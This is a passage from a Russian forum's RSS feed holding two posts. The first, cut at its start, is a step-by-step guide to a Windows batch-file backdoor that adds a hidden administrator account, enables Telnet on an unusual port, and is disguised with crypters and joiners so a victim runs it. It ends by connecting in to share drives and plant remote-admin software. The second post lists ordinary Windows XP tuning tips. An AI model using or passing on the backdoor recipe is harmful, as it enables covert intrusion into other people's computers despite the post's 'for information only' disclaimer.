/&gt; regedit /s conf.reg &lt;br /&gt; sc config tlntsvr start= auto &lt;br /&gt; tlntadmn config port=972 sec=-NTLM &lt;br /&gt; net start Telnet &lt;br /&gt;&lt;br /&gt; все это пишешь в блокноте, и сохраняем как *.bat &lt;br /&gt;&lt;br /&gt; Теперь пояснения: &lt;br /&gt; chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке. &lt;br /&gt; net user SUPPORT_388945a0 /delete и &lt;br /&gt; net localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартную&amp;nbsp;&amp;nbsp;&lt;br /&gt; первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server. &lt;br /&gt; net user hacker hack /add и &lt;br /&gt; net localgroup Администраторы hacker /add - не трудно догадаться, что этими&amp;nbsp;&amp;nbsp;&lt;br /&gt; командами создаётся новая учетная запись с админскими правами,&amp;nbsp;&amp;nbsp;&lt;br /&gt; где логин: hacker &lt;br /&gt; пасс: hack &lt;br /&gt; Так как при создании нового админа он будет виден в welcome screen&apos;е, отключить его&amp;nbsp;&amp;nbsp;&lt;br /&gt; можно импортировав &lt;br /&gt; рег файл в реестр, следующего содержания: &lt;br /&gt; Содержимое conf.re &lt;br /&gt; Windows Registry Editor Version 5.00 &lt;br /&gt; &amp;#91;HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows&amp;nbsp;&amp;nbsp;&lt;br /&gt; NTCurrentVersionWinlogonSpecialAccountsUserLis t] &lt;br /&gt; &quot;hacker&quot;=dword:00000000 &lt;br /&gt; Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start=&amp;nbsp;&amp;nbsp;&lt;br /&gt; auto которая &lt;br /&gt; меняет тип его запуска на автоматический(по дефолту disabled &amp;#41;. &lt;br /&gt; При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это&amp;nbsp;&amp;nbsp;&lt;br /&gt; палевно, поэтому советую прописывать этой командой tlntadmn config port=972&amp;nbsp;&amp;nbsp;&lt;br /&gt; sec=-NTLM , редко используемый порт. В нашем случае это 972. &lt;br /&gt; Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet&amp;nbsp;&amp;nbsp;&lt;br /&gt; окончательно запустит наш бэкдор. &lt;br /&gt;&lt;br /&gt; теперь проверим правильный ли синтаксис кода. Открываем командную строку, если&amp;nbsp;&amp;nbsp;&lt;br /&gt; она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код,&amp;nbsp;&amp;nbsp;&lt;br /&gt; запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так:&amp;nbsp;&amp;nbsp;&lt;br /&gt; Пуск -&gt; Выполнить -&gt; пишем services.msc -&gt; Ok&amp;nbsp;&amp;nbsp;&lt;br /&gt; Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и&amp;nbsp;&amp;nbsp;&lt;br /&gt; смотришь её свойства. При необходимости в любой момент можно её отключить. &lt;br /&gt;&lt;br /&gt; Вот батник готов, и как ты видишь он слишком палевны, при его запуске вылетает&amp;nbsp;&amp;nbsp;&lt;br /&gt; консольное черное окно, говорящее о выполняемых процессах в командной строке. Но&amp;nbsp;&amp;nbsp;&lt;br /&gt; не все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler http&amp;#58;//ifolder.ru/7197807. Она&amp;nbsp;&amp;nbsp;&lt;br /&gt; компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник&amp;nbsp;&amp;nbsp;&lt;br /&gt; превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле.&amp;nbsp;&amp;nbsp;&lt;br /&gt; Вроде готово... Но не совсем, ты же не будешь дарить пустой экзешник, поэтому&amp;nbsp;&amp;nbsp;&lt;br /&gt; бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно&amp;nbsp;&amp;nbsp;&lt;br /&gt; скачать тут http&amp;#58;//ifolder.ru/7198272 pohernah107(13 кб&amp;#41; а джойнер можешь взять здесь http&amp;#58;//ifolder.ru/7197872&amp;nbsp;&amp;nbsp;&lt;br /&gt; RedBindeR_v1.3_Mod(460 кб&amp;#41; . Они помогут тебе склеить файлы в один и изменить&amp;nbsp;&amp;nbsp;&lt;br /&gt; сигнатуру дабы не палится антивирусами.&amp;nbsp;&amp;nbsp;&lt;br /&gt; Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы&amp;nbsp;&amp;nbsp;&lt;br /&gt; тебе осталось только подключится к телнету через указанный тобой порт. Бывает&amp;nbsp;&amp;nbsp;&lt;br /&gt; так что жертва находится в глобальной сети www у которой IP динамический, в этом&amp;nbsp;&amp;nbsp;&lt;br /&gt; случаи, зная диапазон IP его провайдера можно просканировать эту сеть на&amp;nbsp;&amp;nbsp;&lt;br /&gt; открытый наш редко используемый 972 Порт. А чтобы знать когда твой &quot;друг&quot;&amp;nbsp;&amp;nbsp;&lt;br /&gt; в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент. &lt;br /&gt; Осталось подключится. Для этого можешь выбрать стандартный виндосовский&amp;nbsp;&amp;nbsp;&lt;br /&gt; клиент который находится тут c:WINDOWSsystem32telnet.exe.&amp;nbsp;&amp;nbsp;&lt;br /&gt; Запускаешь. Пишешь: &lt;br /&gt; Microsoft Telnet&gt; o 192.168.1.24&amp;#91;IP жертвы] 972&amp;#91;порт] &lt;br /&gt; если пишет: &lt;br /&gt; Welcome to Microsoft Telnet Service &lt;br /&gt; login:_ &lt;br /&gt; то всё акей =&amp;#41;&amp;#41; &lt;br /&gt; Вводишь: &lt;br /&gt; login: hacker &lt;br /&gt; password: hack &lt;br /&gt; Появляется надпись: &lt;br /&gt; *================================================= ==== &lt;br /&gt; Вас приветствует Telnet-сервер производства корпорации Майкрософт &lt;br /&gt; *================================================= ==== &lt;br /&gt; C:&gt;_ &lt;br /&gt;&lt;br /&gt; Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь&amp;nbsp;&amp;nbsp;&lt;br /&gt; управлять кампом, отдавая команды... &lt;br /&gt; Можно к примеру расшарить диски: &lt;br /&gt;&lt;br /&gt; C:&gt;net share disk_c=c: &gt; nul &lt;br /&gt; C:&gt;net share disk_d=d: &gt; nul &lt;br /&gt; C:&gt;net share disk_e=e: &gt; nul &lt;br /&gt;&lt;br /&gt; перезагрузить комп: &lt;br /&gt; C:&gt;shutdown -r -t 1 -c -f &lt;br /&gt;&lt;br /&gt; прописать какой-нибудь ключ реестра: &lt;br /&gt; C:&gt;reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v&amp;nbsp;&amp;nbsp;&lt;br /&gt; DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему &lt;br /&gt;&lt;br /&gt; или поднять ftp сервер и залить радмина для более удобного удаленного&amp;nbsp;&amp;nbsp;&lt;br /&gt; администрирования: &lt;br /&gt; C:&gt;ftp&amp;nbsp;&amp;nbsp;&lt;br /&gt; В общем-то, здесь уже играет фантазия взломщика =&amp;#41; &lt;br /&gt;&lt;br /&gt; Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;p&gt; &lt;!--/ust--&gt;&lt;!--usn(=Читать)--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uSpoiler--&gt;&lt;b&gt;P.S. На все непонятные термины и выражения есть Гугл. &lt;/b&gt; &lt;p&gt; &lt;b&gt;Внимание!!! Данная статья - это не побуждение к действию, все описанное здесь &lt;br /&gt; попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей &lt;br /&gt; информационной безопасности&lt;/b&gt; &lt;p&gt; &lt;b&gt;Источник&lt;/b&gt;- &lt;a class=&quot;link&quot; href=&quot;fssr.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;fssr.ru&lt;/a&gt;</content:encoded>
			<category>Операционные Системы</category>
			<dc:creator>zloi_volk</dc:creator>
			<guid>https://wabsity.do.am/forum/3-5-1</guid>
		</item>
		<item>
			<title>25 советов как ускорить Windows XP</title>
			<link>https://wabsity.do.am/forum/3-4-1</link>
			<pubDate>Tue, 08 Mar 2011 21:38:55 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://wabsity.do.am/forum/3&quot;&gt;Операционные Системы&lt;/a&gt;&lt;br /&gt;Описание темы: 25 советов как ускорить Windows XP&lt;br /&gt;Автор темы: zloi_volk&lt;br /&gt;Автор последнего сообщения: zloi_volk&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>&lt;span style=&quot;font-size:21pt;&quot;&gt;&lt;div align=&quot;center&quot;&gt;&lt;span style=&quot;color:red&quot;&gt;25 советов как ускорить Windows XP&lt;/span&gt;&lt;/div&gt;&lt;/span&gt; &lt;p&gt; &lt;span style=&quot;font-size:12pt;&quot;&gt;&lt;span style=&quot;color:orange&quot;&gt;Цель нижеописанных советов избавить установленную Windows XP Pro Russian от совершенно ненужных для домашнего пользователя украшательств и ускорить в целом работу системы. Эти 25 советов, только часть того, что можно сделать по оптимизации и ускорению Windows XP.Перед применением лучше сделать резервную копию.&lt;/span&gt;&lt;/span&gt; &lt;p&gt; 1.&lt;span style=&quot;color:blue&quot;&gt;Возвращаем классический стиль меню &quot;Пуск&quot;.&lt;/span&gt; &lt;br /&gt; Щелкаем правой кнопкой мыши по таскбару , &quot;Свойства&quot;, вкладка &quot;Меню &quot;Пуск&quot;, выбираем &quot;Классическое меню &quot;Пуск&quot;, жмем &quot;ОК&quot;. &lt;p&gt; 2. &lt;span style=&quot;color:blue&quot;&gt;Убираем эффекты оформления.&lt;/span&gt; &lt;br /&gt; Щелчок правой кнопкой мыши по пустому месту экрана, пункт меню &quot;Свойства&quot;, вкладка &quot;Оформление&quot;. Выбираем &quot;Классический стиль&quot; окон и кнопок. Нажимаем кнопку &quot;Эффекты&quot;. Снимаем все галки, кроме последней. &lt;p&gt; 3.&lt;span style=&quot;color:blue&quot;&gt;Включаем отображение скрытых и ситстемных файлов и папок.&lt;/span&gt; &lt;br /&gt; В &quot;Панели управления&quot; выбираем &quot;Свойства папки&quot;. В открывшемся окне выбираем &quot;Использовать обычные папки &quot;Windows&quot; - это избавит нас от лишних украшательств, которые замедляют процесс навигации. Переходим во вкладку &quot;Вид&quot;. Ставим галочку в пункте &quot;Не кэшировать эскизы&quot; - иначе при просмотре папок с графическими файлами Windows будет замусоривать ее миниатюрными копиями картинок, галочка в пункте &quot;Отображать &quot;Панель управления&quot; в папке &quot;Мой компьютер&quot;; убираем галочки в пунктах &quot;Помнить параметры отображения каждой папки&quot; (опционально) и &quot;Скрывать защищенные системные файлы&quot;; выбираем опцию &quot;Показывать скрытые файлы и папки&quot;. &lt;p&gt; 4. &lt;span style=&quot;color:blue&quot;&gt;Убираем визуальные эффекты.&lt;/span&gt; &lt;br /&gt; В &quot;Панели управления&quot; выбираем &quot;Система&quot;. Во вкладке &quot;Дополнительно&quot; в рамке &quot;Быстродействие&quot; щелкаем на кнопку &quot;Параметры&quot;. В открывшемся окне выбираем пункт &quot;Визуальные эффекты&quot; и убираем все галочки. &lt;p&gt; 5.&lt;span style=&quot;color:blue&quot;&gt;Отключаем отчеты об ошибках.&lt;/span&gt; &lt;br /&gt; Вызываем &quot;Свойства системы&quot; и на вкладке &quot;Дополнительно&quot; - &quot;Отчет об ошибках&quot;, выбираем &quot;Отключить отчет об ошибках&quot;. &lt;p&gt; 6.&lt;span style=&quot;color:blue&quot;&gt;Удаляем Windows Messenger.&lt;/span&gt; &lt;br /&gt; Каждый раз при загрузке системы Messenger тоже стартует, замедляет при этом процесс загрузки, пожирает системные ресурсы. В командной строке Пуск - &quot;Выполнить&quot; напечатать следующее: «RunDll32 advpack.dll,LaunchINFSection %windir%INFmsmsgs.inf,BLC.Remove» и нажать «OK». После перезагрузки Windows Messenger у себя на компьютере вы больше не найдете. &lt;p&gt; 7.&lt;span style=&quot;color:blue&quot;&gt;Устанавливаем оптимальное значение файла подкачки.&lt;/span&gt; &lt;br /&gt; &quot;Свойства системы&quot; - &quot;Дополнительно&quot; - &quot;Быстродействие&quot; - &quot;Дополнительно&quot; -&quot;Виртуальная память&quot; - &quot;Изменить&quot;. Исходный размер и максимальный рекомендуется ставить одинаковым. Для обычной работы достаточно имеющийся объем памяти умножить на 1,5. Для игр памяти требуется в два, два с половиной раза больше. &lt;p&gt; 8. &lt;span style=&quot;color:blue&quot;&gt;Уменьшаем время задержки перед раскрытием вложенных меню.&lt;/span&gt; &lt;br /&gt; Пуск - &quot;Выполнить&quot; напечатать &quot;regedit&quot;. В реестре находим HKEY_CURRENT_USERControl PanelDesktop. Параметр MenuShowDelay меняем с 400 до 0. &lt;p&gt; 9. &lt;span style=&quot;color:blue&quot;&gt;Удаляем ненужные программы из автозагрузки.&lt;/span&gt; &lt;br /&gt; Пуск - &quot;Выполнить&quot; набираем &quot;msconfig&quot;. Вкладка &quot;Автозагрузка&quot; - снимите галочки около тех программ, которые вам не нужны. &lt;p&gt; 10. &lt;span style=&quot;color:blue&quot;&gt;Очищаем папку &quot;prefetch&quot; - C:windowsprefetch.&lt;/span&gt; &lt;br /&gt; В этой папке находятся ссылки на запускаемые приложения и программы. Часть ссылок уже не используется или используется редко, но при загрузке система проверяет наличие ссылок в этой папке. Со временем количество ссылок в этой папки увеличивается на столько, что системе требуется больше времени на проверку. Очистка этой папки ускорит быстродействие вашей системы. Не рекомендуется после очистки папки делать перезагрузку системы. Это ухудшит быстродействие. &lt;p&gt; 11. &lt;span style=&quot;color:blue&quot;&gt;Отключаем индексирование.&lt;/span&gt; &lt;br /&gt; Открываете «Мой компьютер», кликнете правой клавишей мыши на иконке жесткого диска и выбираете «Свойства». В открывшемся окне снимаете галочку «Разрешить индексирование диска для быстрого поиска». После нажатия кнопок «Применить» или «ОК» появится новое окно, в котором вам будет задан вопрос, применить ли выбранные атрибуты только к текущему диску или и к вложенным файлам и папкам тоже. В результате система будет работать немного быстрей. Применимо только для дисков с файловой системой NTFS. &lt;p&gt; 12. &lt;span style=&quot;color:blue&quot;&gt;Файлы архивов не пердставляют собой папки.&lt;/span&gt; &lt;br /&gt; Windows XP считает файлы &quot;Zip&quot; папками — это удобно, если у вас быстрый компьютер. На более медленных системах можно заставить Windows ХР отказаться от этой возможности(если у вас есть другой архиватор, например &quot;RAR&quot;), набрав в командной строке &quot;regsvr32 /u zipfldr.dll&quot;. Все вернуть назад можно командой &quot;regsvr32 zipfldr.dll&quot;. &lt;p&gt; 13. &lt;span style=&quot;color:blue&quot;&gt;Изменяем приоритет запросов на прерывание (IRQ).&lt;/span&gt; &lt;br /&gt; Если увеличить приоритет CMOS-памяти и часов реального времени, то можно увеличить производительность всех элементов системной платы. Открыть &quot;Свойства системы&quot; - &quot;Оборудование&quot; кнопка &quot;Диспетчер устройств&quot;. Теперь откройте свойства интересующего вас устройства, и выберите закладку &quot;Ресурсы&quot;. Здесь вы можете увидеть, какой номер IRQ используется выбранным устройством. Запомните номер прерывания и закройте все окна. Запустите RegEdit . Найдите раздел HKEY_LOCAL_MACHINE/System/CurrentControl &lt;br /&gt; Set/Control/PriorityControl. Создайте новый DWORD ключ IRQ#Priority (где &apos;#&apos; номер IRQ) и установите его в «1». Например, в нашем случае IRQ08 зарезервирован под System CMOS. Поэтому мы создали ключ IRQ8Priority. &lt;p&gt; 14.&lt;span style=&quot;color:blue&quot;&gt;Отключение не используемой подсистемы &quot;POSIX&quot; может несколько увеличить скорость работы.&lt;/span&gt; &lt;br /&gt; Запускаем &quot;Regedit&quot;. Откройте в редакторе реестра ветку HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl SessionManagerSubSystems и удалите строки Optional и Posix. &lt;p&gt; 15. &lt;span style=&quot;color:blue&quot;&gt;Не производить запись последнего доступа к файлам (только NTFS).&lt;/span&gt; &lt;br /&gt; Ускоряет доступ к каталогам с большим количеством файлов. В редакторе реестра &quot;Regedit&quot; HKLMSYSTEMCurrentControlSetControlFileSystem параметр NtfsDisableLastAccessUpdate, значение &quot;1&quot; &lt;p&gt; 16. &lt;span style=&quot;color:blue&quot;&gt;Не использовать файл подкачки для хранения ядра системы.&lt;/span&gt; &lt;br /&gt; По умолчанию WinXP выгружает ядро и системные драйвера в файл подкачки, если они не используются. С помощью данной опции можно указать WinXP хранить ядро и системные драйвера всегда в памяти. Запускаем &quot;Regedit&quot; HKLMSYSTEMCurrentControlSetControlSession ManagerMemory Management параметр DisablePagingExecutive, &quot;1&quot; - не использовать файл подкачки для хранения ядра системы, &quot;0&quot; - использовать &lt;p&gt; 17. &lt;span style=&quot;color:blue&quot;&gt;Автоматически выгружать не используемые библиотеки.&lt;/span&gt; &lt;br /&gt; Эта функция поможет освободить память. Запускаем &quot;Regedit&quot; HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorer параметр AlwaysUnloadDLL, значение &quot;1&quot; - выгружать библиотеки, значение &quot;0&quot; - не выгружать. значение 1 - выгружать библиотеки, значение 0 - не выгружать значение 1 - выгружать библиотеки, значение 0 - не выгружать. &lt;br /&gt; Примечание: возможна нестабильная работа системы при включенной опции. &lt;p&gt; 18. Использовать быстрое переключение пользователей. &lt;br /&gt; Если опция включена, то при переключении на другого пользователя, программы текущего пользователя будут продолжать работать. Иначе, программы будут автоматически выключатся, когда пользователь выходит из системы, и со следующим пользователем компьютер будет работать быстрее. Запускаем &quot;Regedit&quot; HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon параметр AllowMultipleTSSessions, значение &quot;1&quot; - использовать быстрое переключение пользователей &lt;p&gt; 19. &lt;span style=&quot;color:blue&quot;&gt;Отключить встроенный отладчик Dr. Watson.&lt;/span&gt; &lt;br /&gt; Если опция выключена, то при ошибке в программе, будет выводиться соответствующее сообщение об ошибке с кнопками ОК и Отмена, при нажатии ОК - приложение завершается, а при нажатии на отмену запускается отладчик. В редакторе реестра &quot;Regedit&quot; HKLMSOFTWAREMicrosoftWindows NTCurrentVersionAeDebug параметр &quot;Auto&quot; выставляем &quot;0&quot; &lt;p&gt; 20. &lt;span style=&quot;color:blue&quot;&gt;Не вести историю открытия документов.&lt;/span&gt; &lt;br /&gt; Не вести историю &quot;Недавно использовавшихся документов&quot;. Windows XP создает в папке Documents and Settings%USERNAME%Recent ярлыки к запускаемым программам. Вы можете отключить данную возможность, если не пользуетесь ими. Запускаем &quot;Regedit&quot; HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer параметр NoRecentDocsHistory, значение &quot;1&quot;-история не ведется &lt;p&gt; 21. Автоматически завершать зависшие приложения. &lt;br /&gt; Эта опция используется для автоматического закрытия без всякого предупреждения всех зависших программ. Удобно при завершении работы компьютера, если приложение не отвечает, то не надо нажимать на кнопку, чтобы его завершить. Запускаем &quot;Regedit&quot; HKCUControl PanelDesktop параметр AutoEndTasks, значение &quot;1&quot; - автоматически завершать зависшие приложения, &quot;0&quot; - ждать ввода пользователя &lt;p&gt; 22. &lt;span style=&quot;color:blue&quot;&gt;Отключить сообщение о недостатке свободного места на диске.&lt;/span&gt; &lt;br /&gt; Не выдавать сообщение о недостатке места на диске. Имеет смысл использовать данную опцию на дисках малого размера. Запускаем &quot;Regedit&quot; HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer параметр, NoLowDiskSpaceChecks, значение &quot;1&quot; - сообщение отключено, &quot;0&quot; - включено &lt;p&gt; 23. &lt;span style=&quot;color:blue&quot;&gt;Блокировка автоматического обновления в Windows Media Player.&lt;/span&gt; &lt;br /&gt; Windows Media Player периодически устанавливает связь через интернет для проверки существования новой версии программы (Tools-Options-рамка Automatic updates). Можно отключить данную возможность в Windows Media Player. Запускаем &quot;Regedit&quot; HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows MediaPlayer параметр DisableAutoUpdate, значение &quot;1&quot;. &lt;p&gt; 24. Освобождение канала (bandwidth), зарезервированного за сервисом QoS. &lt;br /&gt; Windows XP по умолчанию выделяет часть интернет-канала для Quality of Service (QoS). Назначение QoS — улучшать распределение трафика программ, написанных с учетом QoS API. Этих программ не найдешь, поэтому резервирование канала под ненужный сервис — непозволительная роскошь. Для того, чтобы освободить и без того узкий канал отечественного соединения с Интернетом, в меню Пуск -&gt; Выполнить запустите редактор групповых политик gpedit.msc. Для выполнения вам необходимо быть администратором системы. &lt;p&gt; 25.&lt;span style=&quot;color:blue&quot;&gt;В разделе &quot;Конфигурация компьютера&quot; выберите пункт &quot;Административные шаблоны&quot;, далее &quot;Сеть&quot; и затем в правой панели выберите «Диспетчер пакетов QoS»&lt;/span&gt; и кликните на нем два раза. Выберите опцию &quot;Ограничить резервируемую пропускную способность&quot; и опять-таки кликните на ней два раза. В открывшемся окне включите Enabled, а затем укажите лимит канала в процентах равный нулю, нажмите &quot;ОК&quot; и выйдите из программы. Откройте &quot;Сетевые подключения&quot; на &quot;Панели управления&quot; откройте свойства вашего подключения и на закладке &quot;Сеть&quot; убедитесь, что протокол &quot;Планировщик пакетов QoS&quot; подключен. Если его там нет, то добавьте из списка и перезагрузите компьютер. &lt;p&gt; &lt;b&gt;Источник&lt;/b&gt;: &lt;a class=&quot;link&quot; href=&quot;http://duralei2.livejournal.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://duralei2.livejournal.com&lt;/a&gt;</content:encoded>
			<category>Операционные Системы</category>
			<dc:creator>zloi_volk</dc:creator>
			<guid>https://wabsity.do.am/forum/3-4-1</guid>
		</item>
	</channel>
</rss>